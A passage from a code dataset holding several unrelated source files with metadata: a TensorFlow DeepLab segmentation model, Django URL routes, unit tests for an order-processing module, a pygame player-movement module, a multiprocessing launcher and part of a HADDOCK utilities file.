self._conv2d_same(self.inputs, 64, 3, stride=2, scope='conv1_1')\n net = self._conv2d_same(net, 64, 3, stride=1, scope='conv1_2')\n net = self._conv2d_same(net, 128, 3, stride=1, scope='conv1_3')\n return net\n\n def _bottleneck_resblock(self, net, depth, depth_bottleneck, stride, unit_rate):\n \"\"\"Wrap up the bottleneck function\n \"\"\"\n # If we have reached the target output_stride, then we need to employ\n # atrous convolution with stride=1 and multiply the atrous rate by the\n # current unit's stride for use in subsequent layers.\n if self.output_stride is not None and self.current_stride > self.output_stride:\n raise ValueError('The target output_stride cannot be reached.')\n if self.output_stride is not None and self.current_stride == self.output_stride:\n net = self.bottleneck(net, depth, depth_bottleneck, stride=1, unit_rate=unit_rate, rate=self.rate)\n self.rate *= stride\n else:\n net = self.bottleneck(net, depth, depth_bottleneck, stride, unit_rate, rate=1)\n self.current_stride *= stride\n \n return net\n\n def bottleneck(self,\n inputs,\n depth,\n depth_bottleneck,\n stride,\n unit_rate=1,\n rate=1,\n outputs_collections=None,\n scope=None):\n \"\"\"Bottleneck residual unit variant with BN after convolutions.\n This is the original residual unit proposed in [1]. See Fig. 1(a) of [2] for\n its definition. Note that we use here the bottleneck variant which has an\n extra bottleneck layer.\n When putting together two consecutive ResNet blocks that use this unit, one\n should use stride = 2 in the last unit of the first block.\n Args:\n inputs: A tensor of size [batch, height, width, channels].\n depth: The depth of the ResNet unit output.\n depth_bottleneck: The depth of the bottleneck layers.\n stride: The ResNet unit's stride. Determines the amount of downsampling of\n the units output compared to its input.\n unit_rate: An integer, unit rate for atrous convolution.\n rate: An integer, rate for atrous convolution.\n outputs_collections: Collection to add the ResNet unit output.\n scope: Optional variable_scope.\n Returns:\n The ResNet unit's output.\n \"\"\"\n with tf.variable_scope(scope, 'bottleneck_v1', [inputs]):\n depth_in = utils.last_dimension(inputs.get_shape(), min_rank=4)\n if depth == depth_in:\n shortcut = self._subsample(inputs, stride, 'shortcut')\n else:\n shortcut = self._conv2d(\n inputs,\n depth,\n 1,\n stride,\n activation_fn = None,\n name='shortcut')\n\n residual = self._conv2d(inputs, depth_bottleneck, 1, stride=1, name='conv1')\n\n residual = self._conv2d_same(residual, depth_bottleneck, 3, stride, rate=rate*unit_rate, scope='conv2')\n \n residual = self._conv2d(residual, depth, 1, stride=1, activation_fn=None, name='conv3')\n \n output = tf.nn.relu(shortcut + residual)\n\n return output\n\n\n def _ASPP(self, net, scope, depth=256):\n \"\"\"\n ASPP consists of (a) one 1×1 convolution and three 3×3 convolutions with rates = (6, 12, 18) when output stride = 16\n when output stride = 8, rates are doubled\n (all with 256 filters and batch normalization), and (b) the image-level features as described in https://arxiv.org/abs/1706.05587\n :param net: tensor of shape [BATCH_SIZE, WIDTH, HEIGHT, DEPTH]\n :param scope: scope name of the aspp layer\n :return: network layer with aspp applyed to it.\n \"\"\"\n # get the true output_stride\n self.output_stride *= 4\n\n if self.output_stride == 16:\n rates = [6,12,18]\n elif self.output_stride == 8:\n rates = [12,24,36]\n\n with tf.variable_scope(scope):\n feature_map_size = tf.shape(net)\n\n # apply global average pooling\n image_level_features = tf.reduce_mean(net, [1, 2], name='image_level_global_pool', keepdims=True)\n image_level_features = self._conv2d(image_level_features, depth, 1, activation_fn=None, fine_tune_batch_norm = True, name=\"image_level_conv_1x1\")\n\n image_level_features = tf.image.resize_bilinear(image_level_features, (feature_map_size[1], feature_map_size[2]))\n\n at_pool1x1 = self._conv2d(net, depth, 1, activation_fn=None, fine_tune_batch_norm = True, name=\"conv_1x1_0\")\n\n at_pool3x3_1 = self._conv2d(net, depth, 3, rate=rates[0], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_1\")\n\n at_pool3x3_2 = self._conv2d(net, depth, 3, rate=rates[1], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_2\")\n\n at_pool3x3_3 = self._conv2d(net, depth, 3, rate=rates[2], activation_fn=None, fine_tune_batch_norm = True, name=\"conv_3x3_3\")\n\n net = tf.concat((image_level_features, at_pool1x1, at_pool3x3_1, at_pool3x3_2, at_pool3x3_3), axis=3, name=\"concat\")\n\n net = self._conv2d(net, depth, 1, activation_fn=None, fine_tune_batch_norm = True, name=\"conv_1x1_output\")\n net = tf.layers.dropout(net,rate=0.1,training=self.phase, name=\"dropout\")\n \n return net\n\n def _conv2d_same(self, inputs, num_outputs, kernel_size, stride, rate=1, scope=None):\n \"\"\"Strided 2-D convolution with 'SAME' padding.\n When stride > 1, then we do explicit zero-padding, followed by conv2d with\n 'VALID' padding.\n Note that\n net = conv2d_same(inputs, num_outputs, 3, stride=stride)\n is equivalent to\n net = slim.conv2d(inputs, num_outputs, 3, stride=1, padding='SAME')\n net = subsample(net, factor=stride)\n whereas\n net = slim.conv2d(inputs, num_outputs, 3, stride=stride, padding='SAME')\n is different when the input's height or width is even, which is why we add the\n current function. For more details, see ResnetUtilsTest.testConv2DSameEven().\n Args:\n inputs: A 4-D tensor of size [batch, height_in, width_in, channels].\n num_outputs: An integer, the number of output filters.\n kernel_size: An int with the kernel_size of the filters.\n stride: An integer, the output stride.\n rate: An integer, rate for atrous convolution.\n scope: Scope.\n Returns:\n output: A 4-D tensor of size [batch, height_out, width_out, channels] with\n the convolution output.\n \"\"\"\n if stride == 1:\n return self._conv2d(inputs,num_outputs,kernel_size,1,rate,'same',name=scope)\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n inputs = tf.pad(inputs,[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])\n return self._conv2d(inputs,num_outputs,kernel_size,stride,rate,'valid',name=scope) \n \n def _conv2d(self, \n\t\t\tnet,\n\t\t\tnum_o,\n\t\t\tkernel_size, \n\t\t\tstride=1,\n\t\t\trate=1,\n\t\t\tpadding='SAME',\t\t\t\n\t\t\tweight_decay=0.0001,\n\t\t\tactivation_fn=tf.nn.relu,\n\t\t\tuse_batch_norm=True,\n fine_tune_batch_norm = False,\n\t\t\tname = None):\n\t\n \"\"\"\n Conv2d + BN + relu.\n \"\"\"\n batch_norm_params = {\n 'decay': 0.997,\n 'epsilon': 1e-5,\n 'scale': True,\n 'is_training': self.phase and fine_tune_batch_norm,\n 'fused': True, # Use fused batch norm if possible.\n }\n \n net = tf.contrib.layers.conv2d(net,\n num_o,\n kernel_size,\n stride,\n padding = padding,\n rate = rate,\n activation_fn = activation_fn,\n normalizer_fn = tf.contrib.layers.batch_norm if use_batch_norm else None,\n normalizer_params = batch_norm_params,\n weights_initializer = initializers.variance_scaling_initializer(),\n weights_regularizer = tf.contrib.layers.l2_regularizer(weight_decay),\n scope = name)\n return net\n\n def _subsample(self, inputs, factor, scope=None):\n \"\"\"Subsamples the input along the spatial dimensions.\n Args:\n inputs: A `Tensor` of size [batch, height_in, width_in, channels].\n factor: The subsampling factor.\n scope: Optional variable_scope.\n Returns:\n output: A `Tensor` of size [batch, height_out, width_out, channels] with the\n input, either intact (if factor == 1) or subsampled (if factor > 1).\n \"\"\"\n if factor == 1:\n return inputs\n else:\n return tf.layers.max_pooling2d(inputs, pool_size = 1, strides=factor, padding='same', name=scope)\n\n def _res_stage_nonlocal(self, net, depth, stride, block_id, num_blocks, nonlocal_mod, apply_nonlocal):\n count = 0\n with tf.variable_scope('block%d' %block_id):\n for i in range(1,num_blocks+1):\n with tf.variable_scope('unit_%d' % i):\n block_stride = 2 if (i == num_blocks and stride == 2) else 1\n net = self._bottleneck_resblock(net, depth = depth, depth_bottleneck = depth//4, stride = block_stride, unit_rate=1)\n \n if (i % nonlocal_mod == nonlocal_mod - 1) and apply_nonlocal:\n net = self._nonlocal_block(net, dim_inner=depth//2, scope= 'nonlocal_%d' % count)\n count += 1\n\n return net\n\n def _nonlocal_block(self, net, dim_inner, embed = True, softmax = True, maxpool = 2, scope = None):\n '''\n Args:\n input: Input into the block. Tensor with shape (B,H,W,C)\n dim_inner: Number of bottleneck channels.\n embed: Whether or not use the \"embedding\"\n softmax: Whether or not to use the softmax operation which makes it\n equivalent to soft-attention.\n maxpool: How large of a max-pooling to use to help reduce\n the computational burden. Default is 2, use False for none.\n scope: An optional scope for all created variables.\n Returns:\n A spatial non-local block.\n '''\n with tf.variable_scope(scope):\n if embed:\n theta = tf.contrib.layers.conv2d(net, dim_inner//4, [1, 1], activation_fn=None, normalizer_fn = None, scope='theta')\n phi = tf.contrib.layers.conv2d(net, dim_inner//4, [1, 1], activation_fn=None, normalizer_fn = None, scope='phi')\n else:\n theta = net\n phi = net\n g_orig = g = tf.contrib.layers.conv2d(net, dim_inner, [1, 1], activation_fn=None, normalizer_fn = None, scope='g')\n \n # subsampling after phi and g (max pooling)\n if maxpool is not False and maxpool > 1:\n phi = tf.contrib.layers.max_pool2d(phi, [maxpool, maxpool], stride=maxpool, scope='pool_phi')\n g = tf.contrib.layers.max_pool2d(g, [maxpool, maxpool], stride=maxpool, scope='pool_g')\n \n # reshape (B,H,W,C) to (B,HW,C)\n theta_flat = tf.reshape(theta, [tf.shape(theta)[0], -1, tf.shape(theta)[-1]])\n phi_flat = tf.reshape(phi, [tf.shape(phi)[0], -1, tf.shape(phi)[-1]])\n g_flat = tf.reshape(g, [tf.shape(g)[0], -1, tf.shape(g)[-1]])\n\n theta_flat.set_shape([theta.shape[0], theta.shape[1] * theta.shape[2] if None not in theta.shape[1:3] else None, theta.shape[-1]])\n phi_flat.set_shape([phi.shape[0], phi.shape[1] * phi.shape[2] if None not in phi.shape[1:3] else None, phi.shape[-1]])\n g_flat.set_shape([g.shape[0], g.shape[1] * g.shape[2] if None not in g.shape[1:3] else None, g.shape[-1]])\n\n # Compute f(a, b) -> (B,HW,HW)\n f = tf.matmul(theta_flat, tf.transpose(phi_flat, [0, 2, 1]))\n if softmax:\n f = tf.nn.softmax(f)\n else:\n # replacing softmax with scaling by 1/N, N is the number of positions in x\n f = f / tf.cast(tf.shape(f)[-1], tf.float32)\n\n # Compute f * g (\"self-attention\") -> (B,HW,C)\n fg = tf.matmul(f, g_flat)\n # (B,HW,C) -> (B,H,W,C)\n fg = tf.reshape(fg, tf.shape(g_orig))\n\n # Go back up to the original depth, add residual, zero-init.\n # batch normalization after Wz\n batch_norm_params = {\n 'decay': 0.997,\n 'epsilon': 1e-5,\n 'scale': True,\n 'param_initializers': {'gamma': tf.zeros_initializer()},\n 'is_training': self.phase,\n 'fused': True,\n }\n fg = tf.contrib.layers.conv2d(fg, net.shape[-1], [1, 1], \n activation_fn=None,\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=batch_norm_params,\n scope='fg')\n \n net = net + fg\n return net\n\ndef model_fn(features, labels, mode, params):\n ''' Model function'''\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n train = True\n output_stride = params.train_output_stride\n else:\n train = False\n output_stride = params.eval_output_stride\n \n img_input = tf.reshape(features, [-1, params.crop_size, params.crop_size, 3])\n\n # Create network\n net = ResNet_segmentation(img_input, params, train, output_stride, 'res101')\n\n # predictions\n raw_output = net.outputs\n\n predictions = tf.argmax(raw_output, axis=-1)\n\n # Setup the estimator according to the phase (Train, eval)\n reduced_loss = None\n train_op = None\n eval_metric_ops = {}\n\n # compute loss(train and eval)\n loss = softmax_sparse_crossentropy_ignoring_last_label(labels,raw_output)\n\n # L2 regularization\n l2_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n\n\n # Loss function\n reduced_loss = tf.reduce_mean(loss) + tf.add_n(l2_losses)\n\n # evaluation metric\n miou, update_op = mIOU(raw_output,labels,params.num_classes,img_input)\n\n # configure training\n if mode == tf.estimator.ModeKeys.TRAIN:\n # piecewise learning rate scheduler\n global_step = tf.train.get_or_create_global_step()\n learning_rate = tf.train.piecewise_constant(global_step, params.learning_rate[0], params.learning_rate[1])\n \n # make learning rate available to TensorBoard in TRAIN modes\n tf.summary.scalar('Learning_rate', learning_rate) \n\n # SGD + momentum optimizer\n optimizer = tf.train.MomentumOptimizer(learning_rate,momentum = 0.9)\n # comment out next two lines if batch norm is frozen\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(reduced_loss, global_step=tf.train.get_or_create_global_step())\n\n if mode == tf.estimator.ModeKeys.EVAL:\n eval_metric_ops = {\n 'miou': (miou, update_op)\n }\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=reduced_loss,\n train_op=train_op,\n eval_metric_ops=eval_metric_ops,\n export_outputs=None,\n)","sub_path":"models/deeplab_v3_nonlocal.py","file_name":"deeplab_v3_nonlocal.py","file_ext":"py","file_size_in_byte":21444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39246778","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom plans import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.home, name='home'),\n path('plans/', views.plan, name='plan'),\n path('auth/', include('django.contrib.auth.urls')),\n path('auth/signup', views.SignUp.as_view(), name='signup'),\n path('join', views.join, name='join'),\n path('checkout', views.checkout, name='checkout'),\n path('auth/settings', views.settings, name='settings'),\n path('updateaccounts', views.updateaccounts, name='updateaccounts'),\n]\n","sub_path":"nickfitness/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479313011","text":"'''\nCreated on 2014-01-09\n\n@author: julienbacon\n'''\n\nfrom Log import Log\nfrom ProductOrder import ProductOrder\nfrom Order import Order, sourceFileDontExist, emptyOrder\nimport os\nimport unittest\n\nTEST_FILE_ROOT = r'..\\test_files'\n\ndef productOrderBuilder(prodNb, desc, qty, date, employee):\n prodOrder = ProductOrder()\n prodOrder[ProductOrder.PROD_NB_KEY] = prodNb\n prodOrder[ProductOrder.DESC_KEY] = desc\n prodOrder[ProductOrder.QTY_TO_ORDER_KEY] = qty\n prodOrder[ProductOrder.DATE_KEY] = date\n prodOrder[ProductOrder.EMPLOYEE_KEY] = employee\n return prodOrder\n \nclass OrderLoadingTest(unittest.TestCase):\n ATTENDED_RESULTS = [productOrderBuilder(u'', u'', u'200', u'13/04/1232', u''),\n productOrderBuilder(u'130050', u'coucou', None, u'13/04/1231', u'Daniel'),\n productOrderBuilder(u'133840', u'dodo', u'50', u'01/01/2001', u'justin'),\n productOrderBuilder(u'130090', u'', None, None, u''),\n productOrderBuilder(u'203432', u'bonjour', u'2000', u'01/01/2001', u'jf'),\n productOrderBuilder(u'133045', u'allo', u'100', u'01/01/2001', u'jb')]\n \n def testOrderLoading(self):\n '''\n Order must be able to load its ProductOrders from an excel file, get its\n length and pop right its whole ProductOrder list.\n '''\n log = Log()\n order = Order(log)\n order.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile1.xls'))\n result = []\n for i in range(len(order)):\n result.append(order.popRight())\n i = i\n self.assertListEqual(result, self.ATTENDED_RESULTS, 'Order failed to load its ProductOrder list from an excel file, get its length and popRight its whole ProductOrder list')\n \n def testNoOrderFile(self):\n '''\n Order must raise sourceFileDontExist error when trying load an order\n from an non-existent file.\n '''\n log = Log()\n order = Order(log)\n self.assertRaises(sourceFileDontExist, order.loadOrder,\n os.path.join(TEST_FILE_ROOT, 'allo.xls'))\n \n def testEmptyOrder(self):\n '''\n Order must raise an emptyOrder exception when trying to load an empty\n order file.\n '''\n log = Log()\n order = Order(log)\n self.assertRaises(emptyOrder, order.loadOrder,\n os.path.join(TEST_FILE_ROOT, 'OrderTestFile8.xls'))\n \nclass filterOlderTest(unittest.TestCase):\n ATTENDED_RESULTS = [productOrderBuilder(u'203432', u'bonjour', u'2000', u'14/01/2014', u'jf admin'),\n productOrderBuilder(u'240900', u'lala', u'100', u'14/01/2014', u'guy'),\n productOrderBuilder(u'130090', u'prout', u'200', u'14/01/2914', u'jb'),\n productOrderBuilder(u'033840', u'dodo', u'50', u'14/01/2014', u'justin')]\n ATTENDED_LOG = [u'N/A X 130050 coucou n\\'a pas ete commande a cause d\\'information incomplete.',\n u'200 X N/A N/A n\\'a pas ete commande a cause d\\'information incomplete.',\n u'100 X 133045 allo n\\'a pas ete commande a cause d\\'une commande datant de moins de 20 jours.']\n \n def testFilterOrder(self):\n '''\n Order must be able to filter and remove the bad ProductOrder and those\n already ordered.\n The filters are:\n - imcomplete or incoherent ProductOrder.\n - Already ordered in the last 20 days ProductOrder, except if employee is the admin.\n '''\n log =Log()\n order1 = Order(log)\n order2 = Order(log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile2.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile3.xls'))\n order1.filter(order2)\n result = []\n for i in range(len(order1)):\n result.append(order1.popLeft())\n i = i\n self.assertListEqual(result, self.ATTENDED_RESULTS, 'Order failed to filter and remove the bad and already ordered ProductOrder.')\n \n def testFilterLogging(self):\n '''\n Order must log the ProductOrder that was filtered and the reson why thy were\n filtered.\n '''\n log =Log()\n order1 = Order(log)\n order2 = Order(log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile2.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile3.xls'))\n order1.filter(order2)\n self.assertListEqual(log.getMsgList(), self.ATTENDED_LOG, 'Order failed to log the filtered ProductOrder.')\n \nclass clearAndSaveTest (unittest.TestCase):\n \n def setUp(self):\n '''\n Setup the test case by loading the contant of the files to process the\n attended result.\n '''\n self.__log = Log()\n self.__originalFile1 = Order(self.__log)\n self.__originalFile2 = Order(self.__log)\n self.__originalFile1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile4.xls'))\n self.__originalFile2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile5.xls'))\n self.__attendedResult2 = []\n for prodOrder in self.__originalFile1.getOrderList():\n self.__originalFile2.append(prodOrder)\n self.__originalFile2.popLeft()\n for prodOrder in self.__originalFile2.getOrderList():\n self.__attendedResult2.append(prodOrder)\n \n def tearDown(self):\n '''\n Deleted the new files.\n '''\n os.remove(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n os.remove(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n \n def testClearAndSave(self):\n '''\n Order must be able to clear and save (removing old order) itself.\n '''\n order1 = Order(self.__log)\n order2 = Order(self.__log)\n order1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile4.xls'))\n order2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile5.xls'))\n for i in range(len(order1)):\n order2.append(order1.popLeft())\n i = i\n order1.clear()\n order1.save(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n order2.save(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n resultOrder1 = Order(self.__log)\n resultOrder2 = Order(self.__log)\n try:\n resultOrder1.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile6.xls'))\n except:\n pass\n resultOrder2.loadOrder(os.path.join(TEST_FILE_ROOT, 'OrderTestFile7.xls'))\n result1 = []\n result2 = []\n for prodOrder in resultOrder1.getOrderList():\n result1.append(prodOrder)\n for prodOrder in resultOrder2.getOrderList():\n result2.append(prodOrder)\n self.assertListEqual(result1, [], 'Order failed to clear itself.')\n self.assertListEqual(result2, self.__attendedResult2, 'Order failed to save itself.')\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","sub_path":"src/OrderTest.py","file_name":"OrderTest.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476127046","text":"import pygame\r\nimport world as World\r\nimport math\r\n#player_texture, player_screen_coords, player_direction\r\n\r\nDIAGONAL_LONG = 1/(math.sqrt(2))\r\nDIR_NORTH = 0\r\nDIR_NORTH_EAST = 1\r\nDIR_EAST = 2\r\nDIR_SOUTH_EAST = 3\r\nDIR_SOUTH = 4\r\nDIR_SOUTH_WEST = 5\r\nDIR_WEST = 6\r\nDIR_NORTH_WEST = 7\r\n\r\ndef Init(screen_size):\r\n\tglobal player_move_direction, is_player_moving, player_speed, player_texture, player_screen_coords, player_direction, player_size, player_size_x, player_size_y, player_coords, player_x_coord, player_y_coord\r\n\t#Initialisation des ressources\r\n\tplayer_texture = pygame.image.load(\"../../res/textures/player/player-idle.png\")\r\n\tplayer_size = player_size_x, player_size_y = 92, 116\r\n\tplayer_screen_coords = player_x_screen_coord, player_y_screen_coord = (screen_size[0]-player_size_x)/2, (screen_size[1]-player_size_y)/2\r\n\tplayer_coords = player_x_coord, player_y_coord = 0.0, 0.0\r\n\tplayer_direction = [False, False, False, False, False, False, False, False]\r\n\tplayer_move_direction = DIR_NORTH\r\n\tis_player_moving = False\r\n\tplayer_speed = 0.15 #cases/tick\r\n\r\n\r\ndef EventManager(event): #Event de pygame\r\n\tglobal player_x_coord, player_y_coord, is_player_moving\r\n\tif (event.key == pygame.K_UP) or (event.key == pygame.K_RIGHT) or (event.key == pygame.K_DOWN) or (event.key == pygame.K_LEFT):\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tChangeDirection(event.key, \"KEYDOWN\")\r\n\t\t\t#if event.key == pygame.K_UP:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"north\")\r\n\t\t\t#elif event.key == pygame.K_RIGHT:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"east\")\r\n\t\t\t#elif event.key == pygame.K_DOWN:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"south\")\r\n\t\t\t#elif event.key == pygame.K_LEFT:\r\n\t\t\t#\tWorld.CalcChunk((player_x_coord, player_y_coord), \"west\")\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tChangeDirection(event.key, \"KEYUP\")\r\n\r\n\r\ndef Move():\r\n\tglobal player_x_coord, player_y_coord\r\n\told_x, old_y = player_x_coord, player_y_coord\r\n\tif is_player_moving:\r\n\t\tif player_move_direction == DIR_NORTH:\r\n\t\t\tplayer_y_coord -= player_speed\r\n\t\telif player_move_direction == DIR_NORTH_EAST:\r\n\t\t\tplayer_y_coord -= player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord += player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_EAST:\r\n\t\t\tplayer_x_coord += player_speed\r\n\t\telif player_move_direction == DIR_SOUTH_EAST:\r\n\t\t\tplayer_y_coord += player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord += player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_SOUTH:\r\n\t\t\tplayer_y_coord += player_speed\r\n\t\telif player_move_direction == DIR_SOUTH_WEST:\r\n\t\t\tplayer_y_coord += player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord -= player_speed*DIAGONAL_LONG\r\n\t\telif player_move_direction == DIR_WEST:\r\n\t\t\tplayer_x_coord -= player_speed\r\n\t\telif player_move_direction == DIR_NORTH_WEST:\r\n\t\t\tplayer_y_coord -= player_speed*DIAGONAL_LONG\r\n\t\t\tplayer_x_coord -= player_speed*DIAGONAL_LONG\r\n\t\tx_diff = math.trunc(old_x) - math.trunc(player_x_coord)\r\n\t\tif x_diff > 0:\r\n\t\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"west\")\r\n\t\telif x_diff < 0:\r\n\t\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"east\")\r\n\t\ty_diff = math.trunc(old_y) - math.trunc(player_y_coord)\r\n\t\tif y_diff > 0:\r\n\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"north\")\r\n\t\telif y_diff < 0:\r\n\t\t\tWorld.CalcChunk((player_x_coord, player_y_coord), \"south\")\r\n\r\ndef ChangeDirection(key, type): #Touche du clavier (direction)\r\n\tmove_x = 0\r\n\tmove_y = 0\r\n\tglobal player_direction, is_player_moving, player_move_direction\r\n\tif type == \"KEYDOWN\":\r\n\t\tif key == pygame.K_UP:\r\n\t\t\tplayer_direction[DIR_NORTH] = True\r\n\t\telif key == pygame.K_RIGHT:\r\n\t\t\tplayer_direction[DIR_EAST] = True\r\n\t\telif key == pygame.K_DOWN:\r\n\t\t\tplayer_direction[DIR_SOUTH] = True\r\n\t\telif key == pygame.K_LEFT:\r\n\t\t\tplayer_direction[DIR_WEST] = True\r\n\telif type == \"KEYUP\":\r\n\t\tif key == pygame.K_UP:\r\n\t\t\tplayer_direction[DIR_NORTH] = False\r\n\t\telif key == pygame.K_RIGHT:\r\n\t\t\tplayer_direction[DIR_EAST] = False\r\n\t\telif key == pygame.K_DOWN:\r\n\t\t\tplayer_direction[DIR_SOUTH] = False\r\n\t\telif key == pygame.K_LEFT:\r\n\t\t\tplayer_direction[DIR_WEST] = False\r\n\r\n\tif player_direction[DIR_NORTH]:\r\n\t\tmove_y -= 1\r\n\tif player_direction[DIR_EAST]:\r\n\t\tmove_x += 1\r\n\tif player_direction[DIR_SOUTH]:\r\n\t\tmove_y += 1\r\n\tif player_direction[DIR_WEST]:\r\n\t\tmove_x -= 1\r\n\r\n\tif move_x == 0 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH\r\n\telif move_x == 1 and move_y == 0:\r\n\t\tplayer_move_direction = DIR_EAST\r\n\telif move_x == 0 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH\r\n\telif move_x == -1 and move_y == 0:\r\n\t\tplayer_move_direction = DIR_WEST\r\n\r\n\tif move_x == 1 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH_EAST\r\n\telif move_x == 1 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH_EAST\r\n\telif move_x == -1 and move_y == 1:\r\n\t\tplayer_move_direction = DIR_SOUTH_WEST\r\n\telif move_x == -1 and move_y == -1:\r\n\t\tplayer_move_direction = DIR_NORTH_WEST\r\n\r\n\r\n\tif move_x == 0 and move_y == 0:\r\n\t\tis_player_moving = False\r\n\telse:\r\n\t\tis_player_moving = True\r\n\r\n\r\ndef Display(screen):\r\n\tglobal player_screen_coords, player_texture, player_direction, player_size, player_size_x, player_size_y\r\n\tscreen.blit(player_texture, player_screen_coords, pygame.Rect((0,player_move_direction*player_size_y),player_size))\r\n\r\ndef GetAbsoluteCoords():\r\n\tglobal player_x_coord, player_y_coord\r\n\treturn (math.trunc(player_x_coord), math.trunc(player_y_coord))\r\n\r\ndef GetDecimalCoords():\r\n\tglobal player_x_coord, player_y_coord\r\n\treturn (player_x_coord-math.trunc(player_x_coord), player_y_coord-math.trunc(player_y_coord))\r\n","sub_path":"id1.1.2/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323324617","text":"from multiprocessing import Process\nfrom multi_agent_v7 import main_multi_agent\n\nif __name__ == '__main__':\n starts = list(range(1, 2000, 1000))\n procs = []\n\n for start_index in starts:\n proc = Process(target=main_multi_agent,\n args= ('127.0.0.1:8090', '/home/ronmintz/MatrixCodeLevels/CodeLevel2/GitHubStore/gh_store2017ESX/gh.sqlite', 'users2017', start_index, 1000, 65131614))\n procs.append(proc)\n proc.start()\n\n for proc in procs:\n proc.join()\n \n","sub_path":"MatrixCodeLevels/CodeLevel3/startMultiAgent.py","file_name":"startMultiAgent.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64738735","text":"\"\"\"General utilities.\"\"\"\nimport shutil\nimport subprocess\nfrom copy import deepcopy\nfrom functools import partial\nfrom operator import ge\nfrom os import cpu_count\nfrom pathlib import Path\n\nfrom haddock import log\nfrom haddock.core.exceptions import SetupError\n\n\ncheck_subprocess = partial(\n subprocess.run,\n shell=True,\n check=True,\n stdout=subprocess.DEVNULL,\n )\n\n\ndef get_result_or_same_in_list(function, value):\n \"\"\"\n Return the result if True or the value within a list.\n\n Applies `function` to `value` and returns its result if it evaluates\n to True. Otherwise, return the value within a list.\n\n `function` should receive a single argument, the `value`.\n \"\"\"\n result = function(value)\n return result if result else [value]\n\n\ndef make_list_if_string(item):\n if isinstance(item, str):\n return [item]\n return item\n\n\ndef copy_files_to_dir(paths, directory):\n \"\"\"\n Copy files to directory.\n\n Parameters\n ----------\n paths : iterable of paths\n Source files.\n\n directory : path\n Where to copy files to.\n \"\"\"\n for path in paths:\n shutil.copy(path, directory)\n\n\ndef zero_fill(number, digits=2):\n \"\"\"Makes a number string zero filled to the left.\"\"\"\n return str(number).zfill(digits)\n\n\ndef remove_folder(folder):\n \"\"\"Removes a folder if it exists.\"\"\"\n if folder.exists():\n log.warning(f'{folder} exists and it will be REMOVED!')\n shutil.rmtree(folder)\n\n\ndef remove_dict_keys(d, keys):\n \"\"\"\n Remove `keys` from dictionary (`d`).\n\n Return\n ------\n dict\n A copy of `d` dictionary without the `keys`.\n \"\"\"\n return {k: deepcopy(v) for k, v in d.items() if k not in keys}\n\n\ndef parse_ncores(n=None, njobs=None, max_cpus=None):\n \"\"\"\n Check the number of cores according to HADDOCK3 architecture.\n\n Parameters\n ----------\n n : int or str\n The desired number of cores. If `None` is given, returns the\n maximum number of cores allowed, see `max_cpus`.\n\n njobs : int\n The number of jobs to execute. Optional. The number of cores\n will be compared to `njobs`.\n\n max_cpus : int\n The maximum number of CPUs allowed. If not specified, defaults\n to the available CPUs minus one.\n\n Raises\n ------\n SetupError\n If `n` is not positive or not convertable to `int`.\n\n Returns\n 